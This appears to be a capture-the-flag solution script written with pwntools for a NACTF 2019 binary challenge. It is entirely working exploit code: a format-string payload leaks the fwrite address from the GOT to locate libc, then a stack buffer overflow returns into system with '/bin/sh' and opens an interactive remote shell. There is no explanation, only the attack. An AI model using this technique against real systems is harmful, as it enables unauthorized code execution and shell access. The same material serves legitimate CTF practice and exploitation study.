```
from pwn import *

r= remote('shell.2019.nactf.com', 31283)

_start = 0x08049080

fwrite_got = 0x804c014

r.sendlineafter('Type something>', "%5$s" +p32(fwrite_got)+'a'*(72-8 + 4) + p32(_start))

r.recv(72)

libc = ELF('libc.so.6')

libc_off = u32(r.recv(4)) - libc.symbols['fwrite']

print hex(libc_off)

system_adr = libc_off + libc.symbols['system']

binsh = libc.search('/bin/sh').next() + libc_off

r.sendlineafter('Type something>', 'a' * 76 + p32(system_adr)*2 + p32(binsh))

r.interactive()

```